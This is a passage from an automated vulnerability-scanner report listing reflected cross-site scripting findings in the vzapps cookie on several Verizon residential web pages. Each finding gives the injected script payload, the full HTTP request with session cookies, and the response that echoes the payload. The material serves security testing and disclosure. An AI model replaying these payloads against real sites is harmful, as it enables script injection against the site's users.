MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64988
Expires: Sat, 20 Nov 2010 02:31:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:31:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:31:02 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 02:31:02 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 02:31:02 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 02:31:02 GMT; path=/
Set-Cookie: ContextInfo_State=TX14cf2<script>alert(1)</script>b401d05d87d; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:31:02 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:31:02 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:31:02 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX14CF2<SCRIPT>ALERT(1)</SCRIPT>B401D05D87D </DIV>
...[SNIP]...

1.165. http://www22.verizon.com/residential/bundles/fiosbundles_tp_fi_tv_extremehd/fiosbundles_tp_fi_tv_extremehd.html [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/fiosbundles_tp_fi_tv_extremehd/fiosbundles_tp_fi_tv_extremehd.html

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aaf31'><script>alert(1)</script>25d17e94b9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/fiosbundles_tp_fi_tv_extremehd/fiosbundles_tp_fi_tv_extremehd.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXaaf31'><script>alert(1)</script>25d17e94b9; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67819
Expires: Sat, 20 Nov 2010 02:32:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:32:01 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:32:01 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 02:32:01 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 02:32:01 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 02:32:01 GMT; path=/
Set-Cookie: ContextInfo_State=TXaaf31'><script>alert(1)</script>25d17e94b9; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:32:01 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:32:01 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:32:01 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAAF31'><SCRIPT>ALERT(1)</SCRIPT>25D17E94B9 ' />
...[SNIP]...

1.166. http://www22.verizon.com/residential/bundles/fiosbundles_tp_fi_tv_extremehd/fiosbundles_tp_fi_tv_extremehd.html [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/fiosbundles_tp_fi_tv_extremehd/fiosbundles_tp_fi_tv_extremehd.html

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 5c787<script>alert(1)</script>02d14b87cd6 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/fiosbundles_tp_fi_tv_extremehd/fiosbundles_tp_fi_tv_extremehd.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX5c787<script>alert(1)</script>02d14b87cd6; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67817
Expires: Sat, 20 Nov 2010 02:32:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:32:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:32:03 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 02:32:03 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 02:32:03 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 02:32:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX5c787<script>alert(1)</script>02d14b87cd6; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:32:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:32:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:32:03 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX5C787<SCRIPT>ALERT(1)</SCRIPT>02D14B87CD6 </DIV>
...[SNIP]...

1.167. http://www22.verizon.com/residential/bundles/landing/fios_dp.html [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/landing/fios_dp.html

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 487d7<script>alert(1)</script>4294c013e8a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/landing/fios_dp.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX487d7<script>alert(1)</script>4294c013e8a; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67495
Expires: Sat, 20 Nov 2010 02:25:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:25:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:25:45 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 02:25:45 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 02:25:45 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 02:25:45 GMT; path=/
Set-Cookie: ContextInfo_State=TX487d7<script>alert(1)</script>4294c013e8a; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:25:45 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:25:45 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:25:45 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX487D7<SCRIPT>ALERT(1)</SCRIPT>4294C013E8A </DIV>
...[SNIP]...

1.168. http://www22.verizon.com/residential/bundles/landing/fios_dp.html [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/landing/fios_dp.html

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 27ecc'><script>alert(1)</script>527ab108e3c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/landing/fios_dp.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX27ecc'><script>alert(1)</script>527ab108e3c; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67499
Expires: Sat, 20 Nov 2010 02:25:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:25:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:25:44 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 02:25:44 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 02:25:44 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 02:25:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX27ecc'><script>alert(1)</script>527ab108e3c; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:25:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:25:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:25:44 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX27ECC'><SCRIPT>ALERT(1)</SCRIPT>527AB108E3C ' />
...[SNIP]...

1.169. http://www22.verizon.com/residential/bundles/landing/fios_online_nat.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/landing/fios_online_nat.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8f505'><script>alert(1)</script>57006f3213b was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/landing/fios_online_nat.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX8f505'><script>alert(1)</script>57006f3213b; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67914
Expires: Sat, 20 Nov 2010 02:23:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:23:05 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:23:05 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 02:23:05 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 02:23:05 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 02:23:05 GMT; path=/
Set-Cookie: ContextInfo_State=TX8f505'><script>alert(1)</script>57006f3213b; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:23:05 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:23:05 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:23:05 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8F505'><SCRIPT>ALERT(1)</SCRIPT>57006F3213B ' />
...[SNIP]...

1.170. http://www22.verizon.com/residential/bundles/landing/fios_online_nat.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/landing/fios_online_nat.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 3e91d<script>alert(1)</script>fa73302d9c7 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/landing/fios_online_nat.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX3e91d<script>alert(1)</script>fa73302d9c7; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67910
Expires: Sat, 20 Nov 2010 02:23:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:23:06 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:23:05 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 02:23:05 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 02:23:05 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 02:23:05 GMT; path=/
Set-Cookie: ContextInfo_State=TX3e91d<script>alert(1)</script>fa73302d9c7; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:23:05 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:23:05 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:23:05 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX3E91D<SCRIPT>ALERT(1)</SCRIPT>FA73302D9C7 </DIV>
...[SNIP]...

1.171. http://www22.verizon.com/residential/bundles/landing/fios_online_nat.html [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/landing/fios_online_nat.html

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b9b1b'><script>alert(1)</script>6c8f4a2f9aa was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/landing/fios_online_nat.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXb9b1b'><script>alert(1)</script>6c8f4a2f9aa; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67916
Expires: Sat, 20 Nov 2010 02:30:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:30:49 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:30:49 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 02:30:49 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 02:30:49 GMT; path=/
